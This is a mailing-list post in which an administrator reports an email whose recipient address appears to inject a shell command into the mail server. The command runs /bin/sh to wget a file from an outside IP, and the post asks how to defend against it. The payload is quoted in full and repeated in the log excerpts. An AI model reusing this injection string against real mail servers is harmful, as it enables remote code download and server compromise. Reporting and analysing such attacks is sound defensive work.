Hoping someone can assist me with this...
I just came across an email processed by MIMEDefang that seems to have
had a specially crafted recipient. It seems as if the crafted recipient
managed to coerce either my mimedefang-filter, or MIMEDefang itself to
actually execute script. The recipient was recorded as :
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>
which looks as if it tried to execute /bin/sh -c "wget
65.181.120.163/stfinracu", with at least some partial success, because
the .INPUTMSG file resulted in:
Received: 1
Received: 2
Received: 3
...
...
Received: 31
A Spamassasin scan of this file, then yielded:
1.2 MISSING_HEADERS Missing To: header
1.8 MISSING_SUBJECT Missing Subject: header
2.3 EMPTY_MESSAGE Message appears to have no textual parts and
no Subject: text
1.0 MISSING_FROM Missing From: header
0.0 MSGID_FROM_MTA_HEADER Message-Id was added by a relay
1.4 MISSING_DATE Missing Date: header
which seems to indicate that this lot happened before SpamAssassin ran
in filter_end
My logfile indicated the following:
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: from=<[email protected]>,
size=395, class=0, nrcpts=1, msgid=<201906251921.x5PJLcKV004747@--->,
proto=SMTP, daemon=MTA, relay=minecraft.good-gaming.com [34.228.4.69]
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG: GeoIP
lookup of 34.228.4.69 is 'US'
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG
REPLYTO=, SENDER=<[email protected]>, FROM=
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: SpamAssassin
Result : 7.715
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: Mail Subject :
x5PJLcKV004747 : : 2 : 7.715 : 0.85136 : <[email protected]> :
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>
: 34.228.4.69 : 395
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: filter: discard=1
Jun 25 21:21:41 smtp mimedefang[17340]: x5PJLcKV004747: Discarding
because filter instructed us to
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: data, discard
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: discarded
I would very much like to hear the community's opinion on this and how I
can protect against this?
Thanks in advance!
Stefan
_______________________________________________
NOTE: If there is a disclaimer or other legal boilerplate in the above
message, it is NULL AND VOID. You may ignore it.
Visit http://www.mimedefang.org and http://www.roaringpenguin.com
MIMEDefang mailing list [email protected]
http://lists.roaringpenguin.com/mailman/listinfo/mimedefang
